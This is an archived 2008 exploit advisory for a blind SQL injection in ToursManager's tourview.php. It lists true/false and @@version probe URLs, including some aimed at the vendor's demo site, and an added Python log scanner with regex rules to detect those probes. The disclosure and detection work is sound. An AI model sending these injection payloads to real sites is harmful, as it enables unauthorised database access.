ToursManager - 'tourview.php' Blind SQL Injection



EKU-ID: 15036 CVE: OSVDB-52334;CVE-2008-6303 OSVDB-ID:
Author: XaDoS Published: 2008-11-20 Verified: Verified


[>] Name:-->             ToursManager PhP Script <= Blind Sql Injection

[>] Discovered by:-->  XaDoS

[>] ContacT m&:-->     xados[at]hotmail.it

[>] Site:-->                http://www.toursmanager.com

#########

[■] £XpLoIT:

|: http://www.demosite.com/tourview.php?tourid=2%20and%201=1--   (true)

|: http://www.demosite.com/tourview.php?tourid=2%20and%201=0--   (false)

Version:
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=5  (true)
|: http://www.demosite.com/tourview.php?tourid=2+and+substring(@@version,1,1)=4  (false)

V=> 5.x.x XD
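
Added example, not part of the original advisory: a log check a defender could run to find the true/false and version probes shown above in web-server access logs, by flagging any `tourid` value that is not a plain integer. The log lines, IP addresses, response sizes and rule names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); IPs and sizes are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [20/Nov/2008:10:00:01 +0000] "GET /tourview.php?tourid=2 HTTP/1.1" 200 5120
203.0.113.9 - - [20/Nov/2008:10:00:05 +0000] "GET /tourview.php?tourid=2%20and%201=1-- HTTP/1.1" 200 5120
203.0.113.9 - - [20/Nov/2008:10:00:06 +0000] "GET /tourview.php?tourid=2%20and%201=0-- HTTP/1.1" 200 812
203.0.113.9 - - [20/Nov/2008:10:00:09 +0000] "GET /tourview.php?tourid=2+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5120
198.51.100.4 - - [20/Nov/2008:10:01:00 +0000] "GET /index.php?page=2 HTTP/1.1" 200 900
"""

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) (\d+)')

# Hypothetical rule names; each regex runs on the URL-decoded parameter value.
RULES = [
    ("version-fingerprint", re.compile(r"@@version|version\s*\(", re.I)),
    ("boolean-probe", re.compile(r"\b(?:and|or)\b\s+\d+\s*=\s*\d+", re.I)),
    ("sql-comment", re.compile(r"--|#|/\*")),
]

def classify(value):
    """Return matching rule names; [] when the value is a plain integer."""
    if re.fullmatch(r"\d+", value):
        return []
    hits = [name for name, rx in RULES if rx.search(value)]
    return hits or ["non-integer"]

def scan(log_text, path="/tourview.php", param="tourid"):
    """Collect requests to `path` whose `param` is not a plain integer."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target, _status, size = m.groups()
        url = urlsplit(target)
        if url.path != path:
            continue
        # parse_qs splits on the first '=' and decodes %20 and '+' to spaces.
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            tags = classify(value)
            if tags:
                # Response size is kept: differing sizes for paired probes
                # from one client are the true/false signal of a blind test.
                findings.append({"ip": ip, "value": value,
                                 "tags": tags, "bytes": int(size)})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f)
```

Because a legitimate `tourid` is always an integer, the same allow-list test (`\d+` only) is also the input validation the script needs before the value reaches a query.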

#########
[■] D&M0:

|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=1--

|: http://www.toursmanager.com/demo/tourview.php?tourid=2%20and%201=0--

|: http://www.toursmanager.com/demo/tourview.php?tourid=2+and+substring(@@version,1,1)=5

#########

[■] Th4Nks T0:

> Boom3rang </ (very kind) ;-)
> Langy  </
> Str0ke </

#########

# milw0rm.com [2008-11-20]